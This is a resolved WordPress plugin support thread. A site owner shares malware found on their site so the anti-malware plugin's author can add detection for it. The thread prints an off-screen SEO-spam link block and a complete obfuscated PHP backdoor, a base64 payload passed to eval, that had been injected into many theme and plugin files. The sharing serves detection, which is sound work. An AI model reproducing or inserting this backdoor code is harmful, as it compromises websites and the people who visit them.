Support » Plugin: Anti-Malware Security and Brute-Force Firewall » SEO Spam – MW:SPAM:SEO?v011 Issue

  • Resolved shumail

    (@shumail)



    Hi,

    First of all I would like to Thankyou for a really nice plugin. I got my website infected with malware and when I scanned with Sucuri, it shows that it’s infected with SEO SPAM. The results of scan can be viewed here:
    http://sitecheck.sucuri.net/results/www.7diagonals.com

    When I scanned with the plugin, I found a file named ‘file_upload_include.php’ in wp-content directory, which the plugin identified as backdoor script and it was indeed so. Though it automatically fixed it and I deleted it, the SEO SPAM is still here and scanning the site doesn’t identify this malicious spam despite the definitions of plugin are up to date.

    Can you please look into this and see why it’s not detecting ‘MW:SPAM:SEO?v011’ ? Thanks a lot in advance 🙂

    The payload of infected code is:

    <html>
    <div style='left: -3565px; position: absolute; top: -4812px'>
    <a href="http://www.thenorthface.us.com">The North Face</a>
    <a href="http://www.louisvuittonoutletonline.us.com">Louis Vuitton Outlet Online</a>
    <a href="http://www.cheapuggboot.us.com">Cheap UGGs</a>
    <a href="http://www.newbalanceoutlet.us.com">New Balance Outlet</a>
    <a href="http://www.michaelkorsoutletsonlineco.us.com">Michael Kors Outlet Online</a>
    <a href="http://www.hermesbirkin.us.com">Hermes Birkin</a>
    <a href="http://www.cheapoakley.us.com">Cheap Oakley Sunglasses</a>
    <a href="http://www.northfaceoutlets.us.com">The North Face Outlet</a> 
    
    </div>

    https://wordpress.org/plugins/gotmls/

Viewing 5 replies - 1 through 5 (of 5 total)
  • Plugin Author Eli

    (@scheeeli)

    It looks like you already got rid of it. Sucuri actually caches their scan results so after you click “Force a Re-scan” to clear the cache Sucuri shows the site is clean.

    Let me know if there’s anything else.

    Aloha, Eli

    yeah it’s clean now.

    Though the backdoor was that ‘file_upload_include.php’ in wp-content and I removed it but somehow it infected a lot of files including theme files and many plugin files and added a malicious code. That SEO spam was because of that payload which happened to be in footer.php and i removed it from there, upon which Sucuri now shows that site is clean. But, still I have about 24 files infected.

    Here’s the code that malware added in start of those files: May be you can update the plugin definitions to tackle this and identify it if this issue happens to someone else.

    <?php /*versio:3.02*/ $GLOBALS["hqzafh"]="iGaW5pX3NldAKkYWxsb3dfdXJsX2ZvcGVuwqUVZGlzcGxheV9lcnJvcnMHqtQZmVkb3IvcmVzdG9yZV9hcgSMy4wMgfMVddGhhaDFOaWV0aGFpMnphaDZBaHIktnaHR0cDovLwIRSFRUUFMKsqb2ZmVWNaHR0cHM6Ly8TjaSFRUUF9IT1NUOOdW5pb24QOKGDc2VsZWN0ZcCUkVRVUVTVF9VUkkrOU0NSSVBUX05BTUUyUVVFUllfU1RSSU5HPwGrZGV0ZXJtaW5hdG9yLgiMaDXwLmxvZwuSFRUUF9ZX0FVVEgxqZYmFzZTY0X2RlY29kZQdmVyc2lvPTiLQeQLXBocASgSFRUUF9FWEVDUEhQplwb3V0MBdAb2suNcSFRUUF9VU0VSX0FHRU5UHIrhTjLAZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleACqIOYQfYmxhYnVlbC5uZXQAqDZmFzdGFkZHouY29tL3czLnBocD91PQvJDTJms9qwJnQ9cGhwJnA9HEXfJnY9IzxpapZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TldIdHYya2dRL3lvYkMxVkdkZzIyd1VCelBpWHEwV3VrWGhKUmNsTFZpeXhqcjhIZ0YzN3dpdkxkYjhhN3hpYUJxbi9GN016T2UzNHpHOThqNHBWTFBUK2lyaWk0TktkcDZFZDJIcWRDdS8xQ2ZDQjdSZVRrZmh4WmRPZG5lU2J1dmJTZ1M3b1Z1NUltcTkwMjh0MzRrVzlsTksrSmhqU1V0VzViSm1yNytneFpIVWlhS3FzallPZ0N3eXVwdEJCcjdkSDFacmxQL0pXekZsdEZRdmZMV0NZZldvZDhkZGpOaVVudW43NTlhNU1YVXArRXZwUEd1UjlTTVFmNUlDK2xlWkZHeEtPeFY0bDRvOFZaZWZrbVcreHlKM0xGMWk2TlZ2Wk9KcTN0WXV0bktYalVpcHhWa3V4QnVPQVVhU0JjazFibUJlNHVnUk5PVXdRTC9NcUJoR0VxZlp5RGo0SWRCUEhXZ2t1V0Z5YzBFdHJFQkNtcWdEWnp3MjQ4UDZESWJUbHhsTk1Jd2lvczhqejUxT2tJUkNIY0h2eGlCaWxFK0xBMXZia2psRzdRSUtQblVzTk54SXkwc25TZUhqWmc3UTAvRmVGcWEra0Z6akkrOFFIeUVpZm9SU3YyZkRjUFRvaDBSeDBnM2ZDTEloY3JrODlQazI4UGoxTUwvc2prTjJ4M0NqVDlzcHl2NDl1L3hoT1plRGI0OWt2T3lYajZOTG1mVG03dnYzL0JHenpsbHk5OGZyaS9IMytlVHUvK0dUODhUV1ZpWUNDeTJNM1dkaGtlNW5aMUQwVmh4aTBuaURQYU9NV0EwekRKOXlLL0RHR3V4UWpDOVd1VlhYNWFaUXBMbGRVZ3F2T3kyRmxoWGRSVk4reEM1U1ZCTUZ1dDRjUDJOMGtFNXZlNXpxcCtXY1VuaTJ6UDFKSFRqZ0N6dmFUQUlxaGFSdmg3UENVdlBBdXZnb0pweUZiazYzVDYyRkdWTGh6OGwvNFh3Wit2Y1paL0l2RHh3azE2TFFrWXBvTi9pTGNScUhqOCttZzlmRmVFanFEZzU3L2p5ZmU3aC9zelNwOHltbjY4blVOTmZ3TGw3SDRwcjVLNVhVRHRpMWNYK3B3NzFTWWZQaER4VFYrVGp6WDVENksxNjRBb0dGaG9wNFlocWpZc2UrWEc0NGs4d2tDTHV1dkZQZ1duNkM0SllwZUt3dEUrdVJJSmZFV0VrTVc1ZjNhZmExenh3elAzR0YrcDgvVUVhdHd3WDI2ajljelBab25ZMnVUdVlrK0IzL0g4bE1iZ0JIVVdNUkYrV0lMQ2lZcndDYjRablNmcEZMd09tOFBLelgxdkVmdmdjVGozdmNScjErRFNzcjZQSjVDaG41ejBqTGRiN25hN29MRjVoR0N0SitrRFdkTktXTWl5WXI2dGFYMVYwblc1YkJRLzN0TFliWkQ2a2o2U3RRSFNXTFhVTkxVcnFXb1Bod0lyWFQ4ckkxaVpVL1AxSlJYZ2Y5Qityb2JNelJrbURhUVp5RVN1VEZJZnEwTkpHOHE5RXVUZUdRQVc5SFJaVlhrYU9JTmlabm1heHdETE5EMm55Z0JGTUkyME51YllpMU5xT3d0b1BBc2J5TTRJVDR2NVo1MHp0QmxrSmpIRW54M0t0UkhHQ053RHd4RWdVTVpQTHVDNVlXaFBVZ2NER1FKVm8va2xlUWJFQWJJeC9KVzhnUW9xdTB6ZUsxZ25YbDJPL1ZEcUdiTGF4K0FqcHJ6ajZFRjIrcU9TbzhUSGR3eTZMcW5EWWNtQWViNmNaaDI4N0VJNmpJdTZWRU9YZWlyVHBUU3pQQmhLZzc2c3RXR09uS3NORmYwMVNzblhiOXB0RWZxem1VMjlOUzB5RVlza3BZR2Z6MHpYVHlNYm9NU3l2dHg5RzF0V1cvbnJiZ0p6NFdIeUErUS8zazV1NFJPS2VwMm15WktDNTdkcGF1OUZJblJjdXVsa2l4Q2FYT2prWWRKUlBCamFINHZJMzlWSGQ1L0gxVWx0cnpEOTUxRjRQajBaSDQvRzkvODJPYXFmWU5YSkNiOVE2a0hweHoyakFCQ3lYUXVPTGZCTmdGV0t1Nm9JalBYNGM1dDg1SHRHaDEzS0xsQWRLSHdLdEpNMjRBSEJSc2ptU2JKZDh2cS9xcVloT3l5WGp2SlRNYzlHbG0xSm1iVk4vZHllQmZUa0pqTUdkdzkyZUUxbW9IOVZvV2sxV1JuYmRWbmpaY2NFOVNERm9RRFE4MExZUHR0WU52VkIyUjFRTGRXNldmVmN5N0Z0WjdreEs2QTRVMnZESVlBYWJ4amNDK2QwdnJQTm05RHRWNG9WUGh3NWpDb2NNMHRnRFdlWmE1dHZpbEtwUWRnWVNsam1DcGQ3L2M1NFlGQ0hJMlk3RjFjTzVrTnFweG5HaTUwMVJFTC82a1lKM2hlUVZSdENQRXFIVEpQclJjK1d1eUlJMTQwQjBRWGc2WUxuT0VqWmtPS3o2SFNrMVJkR3VxU3JBRlJ5TlZHVVJzZnFrcVpwcGF0c0VqVm9BN0RIME1Ea2F1Vlp6L2FyWFdKeWs4NVBCdzNrOVRtMndBdUVidXlndXZpYjlxb2oxRHVDV1NMWHlLTWh0Qmk2ckxkWm9lejhYR1ExMHdyREl0d2pNbnpCSlJXU0VHMzI3c0ZEa1B6MWZCbjJKVzNVeC9mUXlZQ3AxbzhhV0VlYUJQTlRhOXJUMHlDYmh0eUhnY2RhTUhmWCs4V2JFY1FNa1kvVUs5TXNiY1MwenAwd08reksxWk90bmU4S1J0SUdJOWs0VWRybmhtQ3A1Zk00VDBJVVVHQzdPV2p5R1NmN0FQYjlMdXNUM0F1eHphSEhtWHBZMDNHTmE4TTZrOE51dzh6a1A1aDgrRkd1aDhkOWpWMUVBMWpjelNrb09vR0ZDbER3TVZXNVZkWkNIaGZPUXF5N0JURFRDUXFYV25IazBNWjVBd2VxM01KVERmVmc0SHpQOVFQbk9BaE94cHF1OTlIVFpzaWd3QWM5ck1lcThVNnRRSWtjYkJweDVFZm9KZHZUU1dNSWprWlNyd3NpZTlBempLOU9tdDVqRzBUdkNCMk5mZ0thUHRSeG9YbmZiRkJNeDR1c1NmRTFsT3lMREo4bmI5N0ZMQVN3KzlaUDQrdjM0V1VRelo4NmIvRkw2eHNJTmdiL1Z3QncvZy9oS0R1NSIpKSk7"; if (!function_exists('yfruejew')){function yfruejew($a, $b){$c=$GLOBALS['hqzafh'];$d=pack('H*','626173'.'6536345f6465636f6465'); return $d(substr($c, $a, $b));};eval(yfruejew(553,3272));};?>

    Going to remove this from all those 24 files manually now. Thankyou very much for your support and prompt response, and great plugin

    Plugin Author Eli

    (@scheeeli)

    Thanks! I just added this new threat to the Definition Update. Please download the new update and let me know if you find any more.

    Aloha, Eli

    Updated the definitions, worked perfectly. Glad to contribute. Will share more, if I find. Thankyou very much once again for awesome work 🙂

    I had same problem. Today i fixed it sucessfully with Anti-Malware and Brute-Force Security by ELI. Thank you very much!

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘SEO Spam – MW:SPAM:SEO?v011 Issue’ is closed to new replies.